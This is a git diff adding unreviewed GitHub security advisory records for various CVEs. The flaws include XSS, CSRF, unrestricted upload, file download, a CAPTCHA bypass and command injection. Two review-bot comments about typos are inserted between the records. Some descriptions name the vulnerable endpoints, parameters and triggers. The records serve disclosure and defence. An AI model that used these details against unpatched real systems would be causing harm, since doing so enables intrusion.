+ },
+ {
+ "type": "WEB",
+ "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T03:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gvqv-h7hh-6fcc/GHSA-gvqv-h7hh-6fcc.json b/advisories/unreviewed/2024/02/GHSA-gvqv-h7hh-6fcc/GHSA-gvqv-h7hh-6fcc.json
new file mode 100644
index 0000000000000..5775576a79c4d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gvqv-h7hh-6fcc/GHSA-gvqv-h7hh-6fcc.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gvqv-h7hh-6fcc",
+ "modified": "2024-02-06T00:30:28Z",
+ "published": "2024-02-06T00:30:28Z",
+ "aliases": [
+ "CVE-2024-24595"
+ ],
+ "details": "Allegro AI’s open-source version of ClearML stores passwords in plaintext within the MongoDB instance, resulting in a compromised server leaking all user emails and passwords.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24595"
+ },
+ {
+ "type": "WEB",
+ "url": "https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-522"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gw24-882g-rww6/GHSA-gw24-882g-rww6.json b/advisories/unreviewed/2024/02/GHSA-gw24-882g-rww6/GHSA-gw24-882g-rww6.json
new file mode 100644
index 0000000000000..9f23504338d18
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gw24-882g-rww6/GHSA-gw24-882g-rww6.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gw24-882g-rww6",
+ "modified": "2024-02-08T00:32:19Z",
+ "published": "2024-02-05T18:31:37Z",
+ "aliases": [
+ "CVE-2024-24468"
+ ],
+ "details": "Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the add_customblock.php.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24468"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/tang-0717/cms/blob/main/3.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T16:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gw6h-pq4q-jjr4/GHSA-gw6h-pq4q-jjr4.json b/advisories/unreviewed/2024/02/GHSA-gw6h-pq4q-jjr4/GHSA-gw6h-pq4q-jjr4.json
new file mode 100644
index 0000000000000..07895efb15b15
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gw6h-pq4q-jjr4/GHSA-gw6h-pq4q-jjr4.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gw6h-pq4q-jjr4",
+ "modified": "2024-02-08T18:30:39Z",
+ "published": "2024-02-08T18:30:39Z",
+ "aliases": [
+ "CVE-2023-47020"
+ ],
+ "details": "Multiple Cross-Site Request Forgery (CSRF) chaining in NCR Terminal Handler v.1.5.1 allows privileges to be escalated by an attacker through a crafted request involving user account creation and adding the user to an administrator group. This is exploited by an undisclosed function in the WSDL that lacks security controls and can accept custom content types.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47020"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Patrick0x41/Security-Advisories/tree/main/CVE-2023-47020"
+ },
+ {
+ "type": "WEB",
+ "url": "https://youtu.be/pGB3LKdf64w"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T16:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gwfv-rx78-gch3/GHSA-gwfv-rx78-gch3.json b/advisories/unreviewed/2024/02/GHSA-gwfv-rx78-gch3/GHSA-gwfv-rx78-gch3.json
new file mode 100644
index 0000000000000..201d4a3f5da90
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gwfv-rx78-gch3/GHSA-gwfv-rx78-gch3.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gwfv-rx78-gch3",
+ "modified": "2024-02-01T12:30:21Z",
+ "published": "2024-02-01T12:30:21Z",
+ "aliases": [
+ "CVE-2023-52193"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Live Composer Team Page Builder: Live Composer allows Stored XSS.This issue affects Page Builder: Live Composer: from n/a through 1.5.23.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52193"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/live-composer-page-builder/wordpress-page-builder-live-composer-plugin-1-5-23-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T10:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gwh8-v9g3-fxxw/GHSA-gwh8-v9g3-fxxw.json b/advisories/unreviewed/2024/02/GHSA-gwh8-v9g3-fxxw/GHSA-gwh8-v9g3-fxxw.json
new file mode 100644
index 0000000000000..8a70b2257bacf
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gwh8-v9g3-fxxw/GHSA-gwh8-v9g3-fxxw.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gwh8-v9g3-fxxw",
+ "modified": "2024-02-06T06:30:30Z",
+ "published": "2024-02-06T06:30:30Z",
+ "aliases": [
+ "CVE-2023-33046"
+ ],
+ "details": "Memory corruption in Trusted Execution Environment while deinitializing an object used for license validation.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33046"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gwp7-vjfg-ffh8/GHSA-gwp7-vjfg-ffh8.json b/advisories/unreviewed/2024/02/GHSA-gwp7-vjfg-ffh8/GHSA-gwp7-vjfg-ffh8.json
new file mode 100644
index 0000000000000..6fd34e583bb52
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gwp7-vjfg-ffh8/GHSA-gwp7-vjfg-ffh8.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gwp7-vjfg-ffh8",
+ "modified": "2024-02-05T18:31:37Z",
+ "published": "2024-02-05T18:31:37Z",
+ "aliases": [
+ "CVE-2023-6028"
+ ],
+ "details": "A reflected\ncross-site scripting (XSS) vulnerability exists in the SVG version of System\nDiagnostics Manager of B&R Automation Runtime versions <= G4.93 that\nenables a remote attacker to execute arbitrary JavaScript code in the context\nof the attacked user’s browser session.\n\n\n\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6028"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.br-automation.com/fileadmin/SA23P018_SDM_Web_interface_vulnerable_to_XSS-1d75bee8.pdf"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T18:15:51Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gxmr-rxpv-c8fq/GHSA-gxmr-rxpv-c8fq.json b/advisories/unreviewed/2024/02/GHSA-gxmr-rxpv-c8fq/GHSA-gxmr-rxpv-c8fq.json
new file mode 100644
index 0000000000000..0b8258d0104c4
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gxmr-rxpv-c8fq/GHSA-gxmr-rxpv-c8fq.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gxmr-rxpv-c8fq",
+ "modified": "2024-02-01T21:30:31Z",
+ "published": "2024-02-01T21:30:31Z",
+ "aliases": [
+ "CVE-2023-5841"
+ ],
+ "details": "Due to a failure in validating the number of scanline samples of a OpenEXR file containing deep scanline data, Academy Software Foundation OpenEX image parsing library version 3.2.1 and prior is susceptible to a heap-based buffer overflow vulnerability.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5841"
+ },
+ {
+ "type": "WEB",
+ "url": "https://takeonme.org/cves/CVE-2023-5841.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-122"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T19:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-h232-jmfv-j93c/GHSA-h232-jmfv-j93c.json b/advisories/unreviewed/2024/02/GHSA-h232-jmfv-j93c/GHSA-h232-jmfv-j93c.json
new file mode 100644
index 0000000000000..f833421c86fcf
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-h232-jmfv-j93c/GHSA-h232-jmfv-j93c.json
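Review bot: The `details` text names the library as `OpenEX image parsing library` while the same sentence refers to `a OpenEXR file`, so `OpenEX` reads as a truncated `OpenEXR`; the inconsistency is carried over from the source description, but it is the product name in an advisory and is worth correcting when this record is reviewed. A `cwe_ids` entry (`CWE-122`) is set here even though `severity` is empty and `database_specific.severity` is `null`, which is consistent with the schema but does mean the record has a weakness classification without any score — fine for an unreviewed import, just noting it so the eventual review fills in the CVSS alongside the CWE.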
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h232-jmfv-j93c",
+ "modified": "2024-02-08T12:30:48Z",
+ "published": "2024-02-08T12:30:48Z",
+ "aliases": [
+ "CVE-2024-24886"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Acowebs Product Labels For Woocommerce (Sale Badges) allows Stored XSS.This issue affects Product Labels For Woocommerce (Sale Badges): from n/a through 1.5.3.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24886"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/aco-product-labels-for-woocommerce/wordpress-product-labels-for-woocommerce-sale-badges-plugin-1-5-3-authenticated-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T11:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-h234-9whq-hx7f/GHSA-h234-9whq-hx7f.json b/advisories/unreviewed/2024/02/GHSA-h234-9whq-hx7f/GHSA-h234-9whq-hx7f.json
new file mode 100644
index 0000000000000..bc61dfff986e6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-h234-9whq-hx7f/GHSA-h234-9whq-hx7f.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h234-9whq-hx7f",
+ "modified": "2024-02-06T06:30:31Z",
+ "published": "2024-02-06T06:30:31Z",
+ "aliases": [
+ "CVE-2023-33064"
+ ],
+ "details": "Transient DOS in Audio when invoking callback function of ASM driver.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33064"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-h24p-75g8-6x6c/GHSA-h24p-75g8-6x6c.json b/advisories/unreviewed/2024/02/GHSA-h24p-75g8-6x6c/GHSA-h24p-75g8-6x6c.json
new file mode 100644
index 0000000000000..08749d92e27b3
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-h24p-75g8-6x6c/GHSA-h24p-75g8-6x6c.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h24p-75g8-6x6c",
+ "modified": "2024-02-07T00:30:25Z",
+ "published": "2024-02-07T00:30:25Z",
+ "aliases": [
+ "CVE-2024-1263"
+ ],
+ "details": "A vulnerability, which was classified as critical, was found in Juanpao JPShop up to 1.5.02. Affected is the function actionUpdate of the file /api/controllers/merchant/shop/PosterController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-253002 is the identifier assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1263"
+ },
+ {
+ "type": "WEB",
+ "url": "https://note.zhaoj.in/share/Lkrp36sa1EHO"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.253002"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.253002"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T23:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-h2f9-j85c-642x/GHSA-h2f9-j85c-642x.json b/advisories/unreviewed/2024/02/GHSA-h2f9-j85c-642x/GHSA-h2f9-j85c-642x.json
new file mode 100644
index 0000000000000..84617d3eff7bd
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-h2f9-j85c-642x/GHSA-h2f9-j85c-642x.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h2f9-j85c-642x",
+ "modified": "2024-02-08T03:32:45Z",
+ "published": "2024-02-08T03:32:45Z",
+ "aliases": [
+ "CVE-2024-24024"
+ ],
+ "details": "An arbitrary File download vulnerability exists in Novel-Plus v4.3.0-RC1 and prior at com.java2nb.common.controller.FileController: fileDownload(). An attacker can pass in specially crafted filePath and fieName parameters to perform arbitrary File download.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24024"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/201206030/novel-plus"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24024.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T01:15:27Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-h2p5-5xgm-h7m9/GHSA-h2p5-5xgm-h7m9.json b/advisories/unreviewed/2024/02/GHSA-h2p5-5xgm-h7m9/GHSA-h2p5-5xgm-h7m9.json
new file mode 100644
index 0000000000000..c702ccf5eeb8e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-h2p5-5xgm-h7m9/GHSA-h2p5-5xgm-h7m9.json
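Review bot: The parameter name `fieName` in `details` looks like a typo for `fileName` (it sits next to `filePath`, and the method named is `fileDownload()`), but it is also possible the application really spells the request parameter that way; since the text comes from the NVD description it should be checked against the linked project code rather than silently "corrected" here. This advisory is also the only one in the batch whose `references` point to a personal GitHub repository with a throwaway-looking path as the primary write-up, so a reviewer adding `affected` ranges later will want a vendor or tracker link to anchor the version bound `v4.3.0-RC1 and prior`.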
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h2p5-5xgm-h7m9",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2023-6963"
+ ],
+ "details": "The Getwid – Gutenberg Blocks plugin for WordPress is vulnerable to CAPTCHA Bypass in versions up to, and including, 2.0.4. This makes it possible for unauthenticated attackers to bypass the Captcha Verification of the Contact Form block by omitting 'g-recaptcha-response' from the 'data' array.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6963"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3022982"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d317f2c7-06f3-4875-9f9b-eb7f450aa2f4?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-h3x8-mmg8-v2pg/GHSA-h3x8-mmg8-v2pg.json b/advisories/unreviewed/2024/02/GHSA-h3x8-mmg8-v2pg/GHSA-h3x8-mmg8-v2pg.json
new file mode 100644
index 0000000000000..e62bbd81bfa5e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-h3x8-mmg8-v2pg/GHSA-h3x8-mmg8-v2pg.json
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h3x8-mmg8-v2pg", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-1255" + ], + "details": "A vulnerability has been found in sepidz SepidzDigitalMenu up to 7.1.0728.1 and classified as problematic. This vulnerability affects unknown code of the file /Waiters. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252994 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1255" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252994" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252994" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T19:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h66j-qwj8-p6m9/GHSA-h66j-qwj8-p6m9.json b/advisories/unreviewed/2024/02/GHSA-h66j-qwj8-p6m9/GHSA-h66j-qwj8-p6m9.json new file mode 100644 index 0000000000000..f96fd04acc97d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h66j-qwj8-p6m9/GHSA-h66j-qwj8-p6m9.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h66j-qwj8-p6m9", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-47142" + ], + "details": "IBM Tivoli Application Dependency Discovery Manager 7.3.0.0 through 7.3.0.10 could allow an attacker on the organization's local network to escalate their privileges due to unauthorized API access. IBM X-Force ID: 270267.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47142" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/270267" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7105139" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T14:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h6hc-84g9-qq4q/GHSA-h6hc-84g9-qq4q.json b/advisories/unreviewed/2024/02/GHSA-h6hc-84g9-qq4q/GHSA-h6hc-84g9-qq4q.json new file mode 100644 index 0000000000000..2201288f34dbc --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h6hc-84g9-qq4q/GHSA-h6hc-84g9-qq4q.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h6hc-84g9-qq4q", + "modified": "2024-02-01T15:30:24Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2023-6078" + ], + "details": "An OS Command Injection vulnerability exists in BIOVIA Materials Studio products from Release BIOVIA 2021 through Release BIOVIA 2023. Upload of a specially crafted perl script can lead to arbitrary command execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6078" + }, + { + "type": "WEB", + "url": "https://www.3ds.com/vulnerability/advisories" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T14:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h73w-5jgh-qcmw/GHSA-h73w-5jgh-qcmw.json b/advisories/unreviewed/2024/02/GHSA-h73w-5jgh-qcmw/GHSA-h73w-5jgh-qcmw.json new file mode 100644 index 0000000000000..0ac96cdb7200d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h73w-5jgh-qcmw/GHSA-h73w-5jgh-qcmw.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h73w-5jgh-qcmw", + "modified": "2024-02-07T03:30:33Z", + "published": "2024-02-07T03:30:33Z", + "aliases": [ + "CVE-2024-1268" + ], + "details": "A vulnerability, which was classified as critical, was found in CodeAstro Restaurant POS System 1.0. This affects an unknown part of the file update_product.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253011.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1268" + }, + { + "type": "WEB", + "url": "https://drive.google.com/drive/folders/1utXNnlH67FjUaBsYhw1cQWyZsO9MLy1i?usp=sharing" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.253011" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.253011" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T02:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h7cg-cp8w-6f8h/GHSA-h7cg-cp8w-6f8h.json b/advisories/unreviewed/2024/02/GHSA-h7cg-cp8w-6f8h/GHSA-h7cg-cp8w-6f8h.json new file mode 100644 index 0000000000000..fdd6d5a4e3d35 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h7cg-cp8w-6f8h/GHSA-h7cg-cp8w-6f8h.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h7cg-cp8w-6f8h", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2024-23032" + ], + "details": "Cross Site Scripting vulnerability in num parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23032" + }, + { + "type": "WEB", + "url": "https://github.com/weng-xianhu/eyoucms/issues/57" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h8jm-hh42-2j69/GHSA-h8jm-hh42-2j69.json b/advisories/unreviewed/2024/02/GHSA-h8jm-hh42-2j69/GHSA-h8jm-hh42-2j69.json new file mode 100644 index 0000000000000..ca916416456a7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h8jm-hh42-2j69/GHSA-h8jm-hh42-2j69.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h8jm-hh42-2j69", + "modified": "2024-02-08T00:32:18Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24260" + ], + "details": "media-server v1.0.0 was discovered to contain a Use-After-Free (UAF) vulnerability via the sip_subscribe_remove function at /uac/sip-uac-subscribe.c.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24260" + }, + { + "type": "WEB", + "url": "https://github.com/yinluming13579/media-server_defects/blob/main/media-server_1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h8pv-m5jr-4f99/GHSA-h8pv-m5jr-4f99.json b/advisories/unreviewed/2024/02/GHSA-h8pv-m5jr-4f99/GHSA-h8pv-m5jr-4f99.json new file mode 100644 index 0000000000000..0df0bc0d9e865 --- /dev/null 